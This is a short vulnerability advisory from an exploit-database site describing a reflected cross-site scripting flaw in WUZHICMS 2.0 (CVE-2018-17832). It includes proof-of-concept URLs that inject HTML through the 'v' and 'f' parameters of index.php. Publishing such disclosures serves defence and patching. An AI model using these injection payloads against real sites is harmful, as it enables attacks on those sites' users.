[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WUZHICMS 2.0 - Cross-Site Scripting Vulnerability

Author
Renzi
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31241
Category
web applications
Date add
02-10-2018
CVE
CVE-2018-17832
Platform
php
# Title: WUZHICMS 2.0 - Cross-Site Scripting 
# Author: Felipe "Renzi" Gabriel
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
  
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.
    
# PoC
 
http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
 
http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>

#  0day.today [2024-12-24]  #